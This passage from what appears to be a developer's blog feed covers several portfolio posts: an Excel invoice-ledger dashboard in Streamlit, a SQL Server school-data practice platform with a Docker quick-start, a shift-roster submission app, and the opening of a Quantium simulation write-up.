If you're working with:

GitHub Actions and Docker-based deployments
DigitalOcean or similar VPS infrastructure
MERN/Next.js applications in production
CI/CD pipelines on a budget

I'd love to connect and trade war stories:

LinkedIn: linkedin.com/in/lfariabr
GitHub: github.com/lfariabr
Portfolio: luisfaria.dev

Tech Stack Summary:

Current Implementation	Future Extensions
GitHub Actions, GHCR, Docker Compose, NGINX, Next.js, Node.js, MongoDB, Redis, Jest, Discord Webhooks	Staging environment, Sentry, zero-downtime rolling updates, Kubernetes migration

Built with ☕ and a couple of failed deploys by Luis Faria

Whether it's concrete or code, structure is everything.

From Excel to Interactive Business Insights with Python & Streamlit

Luis Faria — Mon, 02 Feb 2026 02:49:30 +0000

How I turned a multi-year building invoice ledger into an interactive analytics dashboard — and why it changed how I think about operations, data, and engineering.

"The best code is the code that quietly removes friction from people's work."

🏢 Context: Assistant Building Manager, Real Data, Real Stakes

Over a six-week stretch, I was working as an Assistant Building Manager at a large residential building in the south of Sydney, closely shadowing an experienced Building Manager with 25+ years across construction, water systems, and large-scale facilities operations.

Alongside day-to-day operations, I also built small internal tools — like a Lift Finder utility and myRoster (a shift automation app) — whenever I noticed repetitive friction in the workflow.

This role exposed me to the full operational lifecycle of a high-rise building:

Stakeholder management: Owners Corporation, committee members, residents, strata, contractors
Maintenance workflows: diagnosis → contractor selection → approval → execution → validation
Compliance & regulation: AFSS, fire services, inspections, reporting
Financial reality: invoices, budgets, approvals, recurring vs reactive spend

And obviously — massive amounts of data.

Around the same time, I accepted a Data Analyst role at St Catherine’s School (Read more), which reinforced the same mindset: treat operational noise as structured data waiting to be explored.

Every single decision eventually traced back to one place.

📁 The Starting Point: An Excel Invoice Ledger

Inside the building's shared drive (S://BuildingName/Finances/Invoices) lived an unassuming file:

A multi-sheet invoice ledger
Spanning 4+ years
Thousands of rows
Dozens of contractors
Hundreds of services
GST, dates, approvals, variations, reworks

On paper, it was "just Excel."

In reality, it was:

The financial memory of the building.

Every question led back to it:

How much are we spending on fire services?
Is this contractor consistently expensive or just a one-off?
Why did costs spike mid-2023?
Are we reacting to problems or investing preventatively?

⚠️ The Problem: Excel Doesn't Scale with Questions

Why Excel Became the Bottleneck

Excel Reality	Building Management Reality
Manual filters	Questions come fast
Pivot tables break	Context changes constantly
One question at a time	Multiple stakeholders need answers
10-minute turnaround	Decisions need justification now
Version control chaos	Audit trail required

The typical workflow:

Open Excel (wait for thousands of rows to load...)
Navigate to the right sheet (Building A? B? C?)
Apply filters (Year... Contractor... Service...)
Create pivot table (if you remember how)
Screenshot or copy-paste results
Repeat for the next question 5 minutes later

This wasn't analysis.

It was manual overhead.

And in building management, manual overhead means:

Slower contractor evaluations
Delayed budget approvals
Missed spending patterns
Reactive instead of preventative decisions

🎓 The Engineering Lens: Treating Excel as a Dataset

At the same time, I'm pursuing a Master's in Software Engineering & Artificial Intelligence (see my open-source repo) — so my instinct kicked in:

This isn't an Excel problem.

This is a data exploration problem.

✅ The ledger already had:

Time-series data (4+ years of invoices)
Categorical dimensions (building, contractor, service)
Natural aggregations (monthly spend, contractor totals)
Long-term trends (seasonal patterns, cost escalation)
Outliers that matter financially (unexpected spikes, recurring issues)

The data was already structured.

Microsoft Excel was just the wrong interface for exploration.

So I built a tool in Python that lets non-technical users explore it safely.

🛠️ The Solution

The goal was simple: turn a static spreadsheet into a safe, visual, self-service analytics tool for non-technical users.

I built an interactive analytics dashboard using Python + Pandas + Streamlit to read from the ledger.xlsx file.

In minutes, I could answer questions that used to take 10–15 minutes of Excel wrestling — and export the evidence for emails, audits, or committee meetings.

What It Does

Upload a raw .xlsx invoice ledger → Instantly:

🏢 Filter by building (or view "All" for consolidated insights)
📅 Filter by year(s) (multi-select: 2023 + 2024)
👷 Filter by contractor (compare spending across vendors)
🔧 Filter by service (HVAC vs. Plumbing vs. Fire Services)
🔍 Search by invoice number (quick lookups)
📆 Date range picker (Q3 analysis, seasonal trends)
💰 Amount range slider (focus on high-value invoices)

Auto-compute:

Total spend (GST inc.)
Invoice count
Unique contractors
Service diversity

Visualize:

📊 Contractor spend breakdown (bar chart + color-coded heatmap)
📈 Monthly expense timeline (spot trends, anomalies)
🎨 Cost concentration (which contractors dominate spend?)
🔄 Multi-year comparisons (year-over-year changes)

Export:

📥 Download filtered results as CSV (for reports, audits, approvals)

No pivot tables.

No broken formulas.

No "give me 10 minutes to check."

🏗️ Tech Stack & Architecture

The app follows clean software engineering principles — modular, maintainable, production-ready.

Technology Choices

Layer	Technology	Why
Language	Python 3.10+	Standard for data + automation
Web Framework	Streamlit	Rapid UI development, zero JavaScript
Data Processing	Pandas	Industry-standard DataFrames
Excel Integration	openpyxl	Multi-sheet Excel parsing
Visualization	Streamlit charts + Pandas styling	Built-in, no external dependencies
Deployment	Streamlit Cloud	Free hosting, GitHub integration

Project Structure

invoice-ledger/
├── app.py              # Main UI orchestration
├── data_loader.py      # Excel parsing & data cleaning
├── filters.py          # Interactive filter components
├── analytics.py        # Metrics, charts, visualizations
└── requirements.txt    # Dependencies

Why modular?

✅ Single Responsibility — Each file does one thing well
✅ Testable — Unit test each component independently
✅ Maintainable — Know exactly where to make changes
✅ Reusable — Port components to other PropTech projects
✅ Readable — Onboard new devs in minutes, not hours

🔍 Full module-by-module breakdown available here → docs/ARCHITECTURE.md

📊 The Impact: Before vs. After

Metric	Before (Excel)	After (Dashboard)	Improvement
Query Time	10-15 minutes	~2 minutes	80% faster
Multi-building Analysis	Open 3 files manually	Single "All" view	3x faster
Visualizations	Manual pivot tables	Auto-generated charts	100% automated
Reproducibility	"How did I filter this again?"	Click filters → Export CSV	100% consistent
Contractor Comparison	Side-by-side spreadsheets	Color-coded heatmap	Instant insights
Trend Analysis	Copy-paste into separate tool	Built-in timeline chart	Native support
User Training	"Here's how Excel works..."	"Upload and click"	Zero onboarding

🎯 Real-World Use Cases

1. Contractor Performance Review

Question:

"How much did we spend with ABC Plumbing across all buildings in 2024?"

Old way:

Open 3 Excel files (Building A, B, C)
Filter each by contractor
Sum manually
5 minutes

New way:

Select "All buildings"
Filter contractor: "ABC Plumbing"
Filter year: "2024"
Answer in 30 seconds

The result isn’t just faster — it’s far more presentable, making it suitable for committee meetings, audits, and stakeholder discussions.

2. Budget Planning

Question:

"What's our average monthly HVAC spending?"

Old way:

Filter by service
Create pivot table by month
Calculate average
Hope you didn't break formulas
10 minutes

New way:

Filter service: "HVAC"
View monthly timeline chart
Answer visible immediately

3. Audit Trail for Committee

Question:

"Show me all fire services invoices over $5,000 from Q4 2024"

Old way:

Filter by service
Filter by date range
Filter by amount
Screenshot or print
12 minutes

New way:

Apply 3 filters
Click "Download CSV"
Attach to email
Answer + deliverable in 2 minutes

4. Anomaly Detection

Question:

"Why was November 2023 spending so high?"

Old way:

Create pivot table by month
Spot the spike
Filter November 2023
Manually inspect rows
15 minutes

New way:

View monthly timeline chart (spike visible instantly)
Filter date range: November 2023
Heatmap shows which contractor(s) caused it
Root cause in 3 minutes

Fun Fact

Built in 1 day as a side project during my working hours.

Origin story:

Started in the southB/ directory of my masters-swe-ai repo as a quick experiment. When I realized how useful it was, I:

Cleaned up the code
Made it modular
Created standalone repo
Wrote comprehensive documentation
Deployed publicly

🔗 Links & Resources

Resource	Link
GitHub Repo	github.com/lfariabr/invoice-ledger
Source Code (southB origin)	masters-swe-ai/southB
Live Demo	streamlit app
Excel Template (fake data)	download & explore the data safely - fake data

🚀 Future Roadmap: From Dashboard to PropTech Platform

While the current version solves the immediate problem, here's the possible expansion plan:

1. Database Backend (PostgreSQL/Supabase)

Current: Upload Excel each time

Future: Persistent database with incremental updates

Benefits:

Historical version control
Audit trail (who queried what, when)
Multi-user access with authentication
API for integration with other building systems

2. Predictive Analytics (ML)

Use cases:

"Based on 4 years of data, predict next quarter's HVAC spending"
"Which contractors are trending expensive year-over-year?"
"Seasonal patterns: fire services spike in winter?"

Technical approach:

Time-series forecasting (Prophet)
Contractor spending clustering
Anomaly detection for unusual invoices

3. Automated Reporting

What it does:

Schedule weekly/monthly reports via email

Example workflows:

Every Monday: Summary of last week's spending
End of month: PDF report with charts for Owners Corporation
Budget alerts: Email if spending exceeds threshold

4. Integration with Building Management Systems

Current: Standalone dashboard

Future: Connect to existing PropTech stack

Integrations:

AFSS systems — Auto-import fire inspection costs
Strata software — Sync budget approvals
Contractor portals — Pull invoices directly
Power BI — Feed data to enterprise dashboards

Let's Connect!

Building Invoice Ledger Analytics was a perfect case for me to turn operational friction into engineering opportunity. If you're:

Working in PropTech or building management
Building internal tools for finance or operations
Interested in Python automation and data visualization
Looking for practical Streamlit examples
Hiring for backend/data/PropTech roles

I'd love to connect:

LinkedIn: linkedin.com/in/lfariabr
GitHub: github.com/lfariabr
Portfolio: luisfaria.dev

Tech Stack Summary:

Current	Future Extensions
Python, Streamlit, Pandas, openpyxl	PostgreSQL/Supabase, ML (Prophet/LangChain), Building System APIs (AFSS, Strata), React Native/PWA

Built with ☕ and firsthand building management experience

"The best code is the code that quietly removes friction from people's work."

Learning SQL Server the Hard Way: 16 Days of Real-World Database Work

Luis Faria — Mon, 26 Jan 2026 21:34:03 +0000

From "I've never used SQL Server" to "Here's my 1,000-line operational runbook": How I turned a job opportunity into a portfolio-building sprint.

Hard work is my preferred language and I try to speak it fluently.

🎯 The Opportunity

When "I Don't Know SQL Server" Becomes a Challenge

A friend reached out with an intriguing proposition: "Do you work with Microsoft SQL Server? We're desperate to fill a school data administrator role."

My honest answer? No—but I know databases.

My background spans PostgreSQL, MySQL, MongoDB, and GraphQL. I've built ETL pipelines, optimized queries, designed schemas, and managed production data systems. The fundamentals are universal: normalization, indexing, backup strategies, referential integrity, stored procedures.

SQL Server syntax? Just a dialect I hadn't learned yet.

But here's the thing about job opportunities in unfamiliar territory: saying "I can learn it" isn't enough. Hiring managers hear that every day. What they want is proof.

The Real Challenge

Can I go from zero SQL Server experience to interview-ready in two weeks, with portfolio-quality deliverables to prove it?

This wasn't just about learning T-SQL syntax. The role required:

Managing school data systems (student records, attendance, class scheduling)
Running reports for leadership and teaching staff
Integrating data from legacy systems like SEQTA and Synergetic
Maintaining backup/recovery procedures
Documenting operations for non-technical staff
Operating responsibly with child-safety-sensitive data

The approach: Treat it like a master's assignment. I've spent months tackling academic projects with a disciplined workflow: Receive Brief → Research → Design → Build → Document → Present → NEXT. Why not leverage that momentum?

This is where strategic use of LLMs came into play. Instead of aimlessly "learning SQL Server," I needed a structured challenge that would simulate real-world job responsibilities.

The Prompt That Launched the Project

The prompt:

"I need to demonstrate enterprise-level SQL Server skills for a school data administrator role. Create a comprehensive 3-level assessment covering: (1) database fundamentals and backup/restore, (2) reporting and data integration, (3) operational documentation and training. Structure it like an internal deliverable with real-world scenarios matching school systems like SEQTA and Synergetic."

The Problem

Build a "School Data Platform" on SQL Server, documented like an internal deliverable. Do the deed and show the proof.

The structure emerged as a 3-level assessment simulation (Level 1 → Level 2 → Level 3), matching exactly what the role calls for:

Assessment Level	Focus Area	Real-World Equivalent
Level 1	Database Fundamentals	"Won't break production"
Level 2	Data Integration & Reporting	"Can generate reports and move data between systems"
Level 3	Production Operations	"Documents well, trains staff, operates safely"

📦 StC DataLab Repo

Execution Plan (Dec 2025 - Jan 2026)

Date	Focus	Deliverables	Status
Dec 20-21	Setup & Schema	SQL Server Express + SSMS installation, DB creation, table structure	✅
Dec 22-23	Backup & Restore	Full backup/restore procedures, documentation with screenshots	✅
Dec 24-25	Data Generation	Realistic seed data with edge cases	✅
Dec 26-27	Reporting Views	Student profiles, class rolls, attendance summaries	✅
Dec 28-29	Stored Procedures	Parameter-based queries, optimization	✅
Dec 30-31	Import/Export	CSV handling, staging tables, data validation	✅
Jan 1-2	Runbook & Documentation	Operational procedures, troubleshooting guide	✅
Jan 3-4	Demo Preparation	Presentation script, screenshots, talking points	✅
Jan 5	Final Review	Validate all components, practice demo	✅

Complete changelog with 30+ commits

🤖 The Solution

Building an Enterprise Data Infrastructure

What started as "learn SQL Server syntax" evolved into a complete operational simulation. Here's what I built:

System Architecture

See it in full size

Database Architecture

The foundation is a normalized relational database representing a school's core operational data:

Core Tables (6):

Students (200 records) — Privacy-sensitive fields including medical info, emergency contacts, and boarding status
Staff (20 records) — Role-based attributes (Teacher, Principal, ICT, Admin, Counselor)
Subjects (12 records) — Curriculum structure covering Math, English, Science, Humanities, Arts, Technology
Classes (30 records) — Teacher assignments, room scheduling, year level groupings
Enrollments (500 records) — Student-class relationships with status tracking (Active, Withdrawn, Completed, Pending)
Attendance (800 records) — Daily tracking with status codes (Present, Absent, Late, Excused) across 10 days

Design Principles:

-- Example: Students table with constraints
CREATE TABLE Students (
    student_id INT IDENTITY(1,1) PRIMARY KEY,
    student_number NVARCHAR(20) UNIQUE NOT NULL,
    first_name NVARCHAR(50) NOT NULL,
    medical_info NVARCHAR(500), -- Privacy sensitive
    emergency_contact NVARCHAR(100),
    enrollment_year INT NOT NULL,
    INDEX idx_enrollment_year (enrollment_year),
    INDEX idx_student_number (student_number)
);

Operational Features

1. Reporting Views (4 core views)

vw_StudentProfile — Complete student records with emergency contacts
vw_ClassRoll — Daily attendance with class lists and teacher assignments
vw_AttendanceDaily — Roll call summaries with absence follow-up contacts
vw_EnrollmentSummary — Class capacity planning with utilization metrics

2. Stored Procedures (4 parameterized)

sp_GetStudentProfile — Multi-result set with profile + enrollments + attendance
sp_EnrollmentSummaryByYear — Year-level filtering with capacity indicators
sp_AttendanceByDate — Date range queries for specific time periods
sp_GetTableDataExport — Generic data export for Power BI integration

3. Data Integration Pipeline

CSV import staging tables with validation rules
Referential integrity checks before production load
Error logging and rollback procedures
Export functionality for SEQTA/Power BI sync

4. Backup & Recovery

Full backup T-SQL scripts (SQL Server Express compatible)
Differential backup procedures
Three-stage restore validation (verify → test → production)
RPO: 1 hour | RTO: 30 minutes

How It Works in Practice

Scenario 1: Morning Roll Call

-- Teacher logs in at 8:45 AM, needs today's class roll
EXEC sp_AttendanceByDate 
    @StartDate = '2025-01-22', 
    @EndDate = '2025-01-22';
-- Returns: Student list with attendance status, emergency contacts for absences

Scenario 2: Semester Planning

-- Leadership needs Year 7 enrollment metrics for 2026 planning
EXEC sp_EnrollmentSummaryByYear @EnrollmentYear = 2026;
-- Returns: Class utilization, capacity warnings, subject distribution

Scenario 3: System Integration

-- SEQTA export runs daily at 6 AM, imports new attendance data
-- 1. Load CSV into staging table
-- 2. Validate referential integrity (all student_ids exist)
-- 3. Merge into production Attendance table
-- 4. Log success/failures for monitoring

Data Quality by Design

Intentional edge cases throughout the seed data:

NULL values — Missing phone numbers (9%), NULL emergency contacts
Casing inconsistencies — Lowercase first names, uppercase emails, trailing spaces
International scenarios — Singapore/Jakarta addresses for boarding students
Duplicate data — Shared email addresses to test deduplication logic
Invalid formats — Phone numbers marked as '???', incomplete grades ('INC')

This messy data simulates real school system exports (SEQTA, Synergetic) where cleaning and validation are critical.

Tech Stack

Layer	Technology	Purpose
Database	SQL Server 2022 Express	On-premise simulation (macOS via Docker)
Management	SSMS + sqlcmd CLI	GUI and scripted operations
Data Generation	T-SQL CTEs + temp tables	Deterministic seed data with edge cases
Backup	Native SQL Server backups	Full/differential with RPO/RTO targets
Integration	CSV imports via BULK INSERT	Simulates SEQTA/Synergetic exports
Documentation	Markdown + Mermaid	Runbooks, training guides, flowcharts

Project Structure:

stc_datalab/
├── sql/
│   ├── 00_create_db.sql          # Initial database creation
│   ├── 01_schema.sql             # Tables, constraints, indexes
│   ├── 02_seed_data.sql          # 1,500+ records with edge cases
│   ├── 03_views.sql              # 4 reporting views
│   ├── 04_stored_procedures.sql  # 4 parameterized SPs
│   ├── 05_import_export.sql      # CSV integration logic
│   └── 07_backup_restore.sql     # Backup/recovery procedures
├── data/
│   ├── students_import.csv       # Sample import data
│   ├── classes_import.csv
│   └── enrollments_import.csv
├── docs/
│   ├── Assessment1/              # Level 1: Setup & basics
│   ├── Assessment2/              # Level 2: Integration
│   └── Assessment3/              # Level 3: Operations
│       ├── 06_runbook.md         # 1,000+ line operational guide
│       ├── 07_demo_script.md     # Interview presentation
│       └── 08_staff_training_guide.md
└── screenshots/                  # 15+ annotated screenshots

The Impact: Confidence Through Deliverables

This wasn't just practice—it was portfolio-building with interview-ready artifacts:

Metric	Result
Technical documentation	3,000+ lines across 15 files
SQL scripts	10 files, 800+ lines of T-SQL
Seed data generated	1,562 records across 6 tables
Views & procedures	8 reusable database objects
Operational runbook	1,000+ lines with flowcharts
Training materials	Non-technical staff guide
Time investment	16 days, committed execution

What This Proves

Skill Category	Evidence
Database fundamentals	Schema design with normalization, constraints, indexes
T-SQL proficiency	CTEs, window functions, stored procedures, error handling
Data integration	CSV imports with staging, validation, rollback procedures
Backup/recovery	Full/differential backups, 3-stage restore validation
Documentation	Runbooks, training guides, troubleshooting flowcharts
Production mindset	Security (least privilege), audit logging, change management

Interview Readiness

Instead of saying "I can learn SQL Server", I can now walk into an interview and say:

"I built a production-grade school data platform with 6 normalized tables, 8 reporting objects, comprehensive backup procedures, and operational documentation. Here's the GitHub repo, here's the demo script, and here are the 15 annotated screenshots. Let me show you the runbook."

Future Roadmap: From Simulation to Production

While this project is interview-focused, the architecture supports real-world expansion:

1. Power BI Dashboard Integration

Connect reporting views to interactive dashboards
Real-time attendance monitoring with alerting
Enrollment trend analysis across years
Teacher workload visualization

2. Automated SEQTA Sync

Scheduled SSIS packages for nightly imports
Incremental updates with change data capture
Email notifications on import failures
Data quality scorecards

3. Advanced Security & Compliance

Row-level security based on staff roles
Transparent data encryption for medical_info
Audit tables with temporal queries
GDPR-compliant data retention policies

4. Performance Optimization

Columnstore indexes for historical reporting
Query Store analysis for slow queries
Database partitioning by enrollment_year
Read replicas for Power BI loads

5. Cloud Migration Path

Azure SQL Database deployment
Geo-replication for disaster recovery
Azure Data Factory for ETL orchestration
Integration with Microsoft 365 (SharePoint, Teams)

Key Takeaways

This project reinforced several engineering principles:

Build to prove, not just to practice — Every decision was portfolio-oriented
Documentation = Deliverable — The runbook is as important as the code
Simulate real constraints — SQL Server Express limits forced production-ready design
Edge cases reveal skill — Intentional data quality issues prove validation competency
Timeline discipline — 16-day execution plan kept momentum and accountability

Try It Yourself

The complete project is open source and ready to deploy:

Resource	Link
GitHub Repo	github.com/lfariabr/stc-datalab
Setup Guide	Assessment 1 Documentation
Operational Runbook	06_runbook.md
Demo Script	07_demo_script.md

Quick Start (Docker):

# 1. Clone the repo
git clone https://github.com/lfariabr/stc-datalab.git
cd stc-datalab

# 2. Start SQL Server Express
docker run -e "ACCEPT_EULA=Y" \
  -e "MSSQL_SA_PASSWORD=StC_SchoolLab2025!" \
  -e "MSSQL_PID=Express" \
  -p 1433:1433 --name sqlserver \
  -d mcr.microsoft.com/mssql/server:2022-latest

# 3. Create database and schema
sqlcmd -S localhost -U sa -P 'StC_SchoolLab2025!' -C -i sql/00_create_db.sql
sqlcmd -S localhost -U sa -P 'StC_SchoolLab2025!' -C -i sql/01_schema.sql

# 4. Seed demo data
sqlcmd -S localhost -U sa -P 'StC_SchoolLab2025!' -C -i sql/02_seed_data.sql

# 5. Test reporting
sqlcmd -S localhost -U sa -P 'StC_SchoolLab2025!' -C -Q \
  "USE StC_SchoolLab; EXEC sp_AttendanceByDate @StartDate='2025-01-22', @EndDate='2025-01-22';"

Let's Connect!

This project exemplifies my approach to technical challenges: structured execution, production-quality deliverables, and comprehensive documentation. If you're:

Building enterprise data systems
Working with SQL Server in education/non-profit sectors
Interested in data engineering best practices
Hiring for database administration roles

I'd love to connect:

LinkedIn: linkedin.com/in/lfariabr
GitHub: github.com/lfariabr
Portfolio: luisfaria.dev

Tech Stack Summary:

Current Implementation	Production Extensions
SQL Server 2022 Express, SSMS, T-SQL, Docker, Markdown	Azure SQL Database, SSIS, Power BI, Columnstore Indexes, TDE, Azure Data Factory

Built with 🎓 and database discipline by Luis Faria

Hard work is my preferred language and I try to speak it fluently.

myRoster: from copypaste to 2-minute submissions

Luis Faria — Wed, 21 Jan 2026 17:12:39 +0000

From tedious spreadsheet rituals to 2-minute submissions: how I turned a workplace pain point into a productivity multiplier.

"The best automation isn't flashy — it's invisible. It just works."

🎯 The Challenge:

When Spreadsheets Become a Time Sink

If you've ever worked in shift-based operations, you know the drill. Every roster cycle, the same tedious routine: open a spreadsheet, manually tick boxes for every single day you're available, triple-check you didn't miss anything, export it, draft an email, attach the file, and finally hit send. Rinse and repeat, week after week.

For one HR team I've met, this process was eating up valuable time that could have been spent on actual work:

Pain Point	Impact
Manual entry	15-20 minutes per roster cycle per employee
Inconsistent formats	HR receives varied submissions, coordination nightmare
Error-prone	Missed dates, wrong shifts, duplicate entries
Soul-crushing	Nobody looks forward to roster week

I saw this inefficiency firsthand and thought: There has to be a better way.

Spoiler: There was.

🤖 The Solution:

myRoster: Automation Meets Simplicity

That's when myRoster was born: A lightweight and intuitive web application that transforms shift availability submission from a chore into a 2-minute task.

How It Works

myRoster is built as a Streamlit-powered web app that runs entirely in the browser. No complex installations, no training sessions—just open the link and you're ready to go. Here's what makes it tick:

1. Smart Roster Period Calculation
The app automatically calculates the next roster cycle based on HR's scheduling logic. No more guessing which dates to fill out—the system knows exactly what period you're submitting for, starting from the Monday three weeks ahead and spanning a full 4-week cycle.

2. Interactive Spreadsheet Interface
Instead of static forms, users interact with a familiar spreadsheet-like grid. Each week is organized in collapsible sections, showing dates, days of the week, and three shift columns (7am-3pm, 3pm-11pm, 11pm-7am). Just click the checkboxes for your available shifts—no hunting through dropdowns or typing dates manually.

3. One-Click Weekly Shortcuts
Need to mark yourself available for all morning shifts in a week? One button. Want to clear an entire week? Another click. These shortcuts eliminate repetitive clicking, cutting entry time by more than half.

4. Real-Time Progress Tracking
As you make selections, myRoster instantly updates your coverage statistics—showing total shifts selected, number of days covered, and a visual progress bar. You know exactly where you stand before submitting.

5. One-Click Submission
Hit "Preview & Submit," and myRoster generates a clean CSV file, automatically emails it to HR with a professional HTML template, and optionally sends you a copy. The entire process—from opening the app to hitting send—takes under 2 minutes.

Tech Stack

I kept the technology intentionally lean:

Layer	Technology	Purpose
Backend	Python 3.10+	Core logic, date calculations
Frontend	Streamlit	Interactive web UI, zero JS needed
Data	Pandas	Shift matrices, CSV export
Email	Gmail SMTP (GCP)	Automated delivery
Deployment	Streamlit Cloud	One-click deploy from GitHub

Project Structure:

myRoster/
├── app.py                    # Main Streamlit entry point
├── views/
│   └── rosterView.py         # UI components
├── helpers/
│   └── roster.py             # Date calculations
└── services/
    └── email.py              # Email automation

The modular architecture makes it easy to extend features or adapt for different scheduling needs.

The Impact: Time Saved, Efficiency Gained

The results speak for themselves:

Metric	Before	After
Submission time	15-20 minutes	~2 minutes
Format consistency	Varies by employee	100% standardized
Error rate	Frequent	Zero
Employee satisfaction	Dreaded task	Quick and painless

Future Roadmap: From MVP to Platform

While myRoster already delivers significant value in its current form, there's immense potential to evolve it from a standalone tool into a comprehensive workforce management platform. Here's what I've mapped out:

1. Multi-Provider Email Infrastructure

Current state: Relies solely on Gmail SMTP via Google Cloud Platform
Next iteration: Integration with Resend for more reliable transactional email delivery

Why this matters:

Automated reminders: Schedule notifications 48 hours before roster deadlines
Smart alerts: Notify HR when submissions are incomplete or coverage is below threshold
Employee confirmations: Send automatic receipts when availability is successfully submitted
Higher deliverability: Resend offers better inbox placement and detailed analytics compared to SMTP

This would transform myRoster from a submission tool into an active communication hub that keeps everyone informed and on track.

2. Robust Backend with Supabase

Current limitation: No persistent user data, authentication, or preferences
Next evolution: Full-stack upgrade with Supabase as the backend

Features unlocked:

Authentication: Secure login with email/password or SSO via EmploymentHero
User profiles: Save preferred shifts, notification settings, and contact preferences
Historical data: View past submissions, track coverage trends over time
Saved drafts: Start filling out availability, save progress, and return later
Admin dashboard: HR users get real-time coverage analytics, submission status tracking, and bulk operations
Role-based access control: Employees, HR, and managers see different views and capabilities

Why Supabase?

PostgreSQL database with real-time subscriptions (perfect for live coverage updates)
Built-in authentication and row-level security
RESTful and GraphQL APIs out of the box
Integrates seamlessly with Python backends
Free tier suitable for MVP, scales affordably

Migration path:
Current CSV-based workflow becomes a fallback option while Supabase gradually handles user data, preferences, and analytics storage.

3. Machine Learning #1: Pattern Recognition & Predictive Scheduling

What it does:
Analyze historical availability data to identify patterns in employee behavior, building coverage needs, and seasonal trends.

Use cases:

Coverage prediction: "Based on historical data, Building A typically has low evening shift coverage in December. Flag this 3 weeks in advance."
Employee behavior insights: "User X consistently submits availability on the last day—send them an early reminder."
Building-specific trends: "Building B requires 15% more morning shifts during summer months—adjust recommendations accordingly."
Anomaly detection: Flag unusual submission patterns that might indicate scheduling conflicts or errors

Technical approach:

Time-series analysis using scikit-learn or Prophet
Clustering algorithms to group similar availability patterns
Lightweight models that can run serverless (no heavy infrastructure needed)

Real-world impact:
HR teams can proactively address coverage gaps before they become emergencies, and employees get personalized nudges based on their actual behavior patterns.

4. Machine Learning #2: RAG-Powered Knowledge Base

Inspired by: AI Engineering na Prática: Construindo RAG com Neural Networks

What it does:
Build a conversational AI assistant powered by Retrieval-Augmented Generation (RAG) that understands roster policies, shift rules, and employee FAQs.

Employee experience:

"Which shifts do I need to fill for Christmas week?" → AI retrieves company holiday policies + roster dates and provides personalized guidance
"What happens if I can't work my scheduled shift?" → AI surfaces shift swap procedures, contact info, and deadline policies
"Show me my availability history for Q4 2025" → AI queries the database and presents formatted historical data

HR experience:

Automated responses to repetitive questions
Instant access to shift coverage analytics via natural language queries
Policy enforcement reminders embedded in the chat experience

Technical stack:

Vector database (Pinecone, Weaviate, or Supabase pgvector) for document embeddings
LLM integration (OpenAI GPT-4, Claude, or open-source alternatives like Llama)
RAG framework (LangChain or LlamaIndex) for retrieval logic
Knowledge base: Company policies, shift rules, historical data, and FAQs

Why this is powerful:
Instead of just automating form submission, myRoster becomes an intelligent assistant that understands the nuances of scheduling, reduces HR support burden, and makes policy information instantly accessible.

5. EmploymentHero API Integration

Current pain point: Employees submit via myRoster → HR manually copies CSV data into EmploymentHero
Automated future: Direct API integration eliminates manual data entry entirely

How it works:

Employee submits availability in myRoster
System authenticates via EmploymentHero API
Availability data is automatically synced to the employee's EH profile
HR sees updated availability directly in their scheduling dashboard—no CSV, no copy-paste, no errors

Additional benefits:

Bi-directional sync: Pull existing shift schedules from EH into myRoster for reference
Conflict detection: Cross-reference submitted availability against existing scheduled shifts
Deeper insights: Combine myRoster's ML analytics with EH's payroll and attendance data for comprehensive workforce planning
Single source of truth: Eliminate data duplication and version control issues

Technical implementation:
EmploymentHero provides a REST API with endpoints for employee data, shift scheduling, and time & attendance. Integration would involve:

OAuth 2.0 authentication
Middleware service to translate myRoster data models into EH-compatible formats
Webhook listeners for real-time updates from EH back to myRoster

Real-world impact:
This closes the loop entirely. What started as "save 15 minutes per employee" becomes "eliminate an entire manual workflow for HR"—potentially saving dozens of hours per roster cycle across the organization.

Curious about the Timeline? Check my CHANGELOG for a detailed breakdown.

Key Takeaways

This project reinforced principles I apply to every build:

Start with the pain point: Every feature traces back to real user frustration
Ship fast, iterate often: MVP in days, not months
Boring tech wins: Streamlit + Pandas = production-ready in hours
Design for extensibility: Modular architecture enables future growth
Measure impact: 90% time reduction is the kind of number that screams ROI

Try It Yourself

myRoster is live and open source:

Resource	Link
Live Demo	myroster.streamlit.app
Source Code	github.com/lfariabr/roster

If you're building internal tools or automating workflows, I'd love to hear how you approach similar problems.

Let's Connect!

Building myRoster has been a perfect example of turning workplace friction into engineering opportunity. If you're:

Automating internal workflows
Building tools with Streamlit
Passionate about practical productivity solutions
Interested in Python automation

I'd love to connect:

LinkedIn: linkedin.com/in/lfariabr
GitHub: github.com/lfariabr
Portfolio: luisfaria.dev

Tech Stack Summary:

Current	Future
Python, Streamlit, Pandas, Gmail SMTP (GCP)	Supabase, Resend, OpenAI/RAG, EmploymentHero API, ML (scikit-learn/Prophet)

Built with ☕ and automation by Luis Faria

I Built a Sales Visualizer for a Real Business Problem (Quantium Software Engineering Simulation)

Luis Faria — Mon, 29 Dec 2025 22:22:56 +0000

End of the year and I thought it would be a great way to close out 2025 by putting myself through this Software Engineering simulation presented by Quantium on Forage.

After tackling the Tata GenAI Data Analytics Challenge and building various data-driven applications, I was ready for another hands-on project. That's when I discovered Quantium's Software Engineering simulation.

As someone who loves building practical solutions, I figured this would sharpen my skills in data processing, visualization, and end-to-end application development. Spoiler: it delivered exactly that.

"The best way to learn is by building something real."

Here's my journey of building a production-quality data visualizer from raw CSV files to a polished, interactive Dash application.

Want to jump in yourself? Check out the simulation here before reading. SPOILER ALERT ahead!

The Scenario: Software Engineer at Quantium

The simulation places you in the role of a software engineer at Quantium, working in the financial services business area. Here's the brief:

Client: Soul Foods

Problem: Sales decline on their top-performing candy product (Pink Morsels) after a price increase

Goal: Build an interactive data visualizer to answer: "Were sales higher before or after the price increase on January 15, 2021?"

This wasn't just a tutorial exercise. This was about solving a real business question with code.

The Challenge: Six Progressive Tasks

What I loved about this simulation was the progressive scaffolding. Each task built naturally on the previous one, mirroring how real software projects evolve.

Task 1: Set Up Local Development Environment

The first task was all about the fundamentals—forking the repo, setting up a Python virtual environment, and installing dependencies like Dash and Pandas.

The mindset shift: Don't underestimate a well-organized workbench. Time invested here pays dividends throughout the project.

Task 2: Data Processing — The Art of Reshaping Data

With the environment ready, I tackled three messy CSV files containing transaction data for Soul Foods's entire morsel product line. My job? Transform raw data into actionable insights.

The transformation pipeline:

Filter: Keep only Pink Morsels rows (bye-bye, other products)
Calculate: Multiply quantity × price to get Sales
Normalize: Handle currency symbols, parse dates, standardize regions
Output: A clean CSV with just Sales, Date, and Region

I built a robust ETL script with flexible column detection (find_column) to handle variations in column naming. This kind of defensive coding is essential for real-world data pipelines.

Task 3: Create the Dash Application

Now the fun part—bringing data to life! I built a Dash application with:

A clear header explaining the business question
